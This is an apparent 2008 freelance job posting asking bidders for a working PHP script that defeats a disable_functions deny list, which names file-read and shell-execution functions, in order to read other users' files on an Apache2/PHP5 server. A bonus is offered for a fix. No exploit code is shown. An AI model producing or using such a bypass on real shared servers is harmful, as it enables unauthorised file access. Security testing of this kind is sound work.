Assuming a PHP5/Apache2 web server has been setup with the following line in the [url removed, login to view]: disable_functions = readfile, fpassthru, file, file_get_contents, system, fopen, symlink, rename, copy, exec, passthru, pcntl_exec, backtick_operator, shell_exec, popen, proc_open Tell me a way in which any untrusted PHP scripts running on this server can retrieve and display the contents of an arbitrary file on the server. Hypothetical answers will not be accepted. An actual exploit script will need to be uploaded to RAC. You'll need to setup your own server for experimentation & research. In your setup you should set the [url removed, login to view] as shown above, and create a userid e.g. "hacker" who will be trying to gain access to files owned by other users, including files that are public-read, e.g. chmod 644. If the hacker can retrieve the full contents of any such file, you have a successful attack. include/require don't count - These functions do not allow anyone to retrieve and display anything, just execute it and throw errors (unless it's valid PHP). MySQL exploits - assume the mysql userid does not have access to any interesting parts of the filesystem. So, LOAD DATA INFILE won't work. ***BONUS***: An additional 100% of your Bid amount will also be paid, if you can provide a solution on how to close any security hole that you find.
1) Complete and fully-functional working program(s) in executable form as well as complete source code of all work done.
2) Deliverables must be in ready-to-run condition, as follows (depending on the nature of the deliverables):
a) For web sites or other server-side deliverables intended to only ever exist in one place in the Buyer's environment--Deliverables must be installed by the Seller in ready-to-run condition in the Buyer's environment.
b) For all others including desktop software or software the buyer intends to distribute: A software installation package that will install the software in ready-to-run condition on the platform(s) specified in this bid request.
3) All deliverables will be considered "work made for hire" under U.S. Copyright law. Buyer will receive exclusive and complete copyrights to all work purchased. (No GPL, GNU, 3rd party components, etc. unless all copyright ramifications are explained AND AGREED TO by the buyer on the site per the coder's Seller Legal Agreement).
* * *This broadcast message was sent to all bidders on Wednesday Jul 16, 2008 9:45:47 AM:
***IMPORTANT*** The requirements for this project have changed a few times. If you had seen this project previously, please re-read the requirements and update your bid.
Apache2/PHP5 on Ubuntu 6.10, configured using apt-get install. This is a standard Ubuntu setup with Apache2 running under the www-data userid.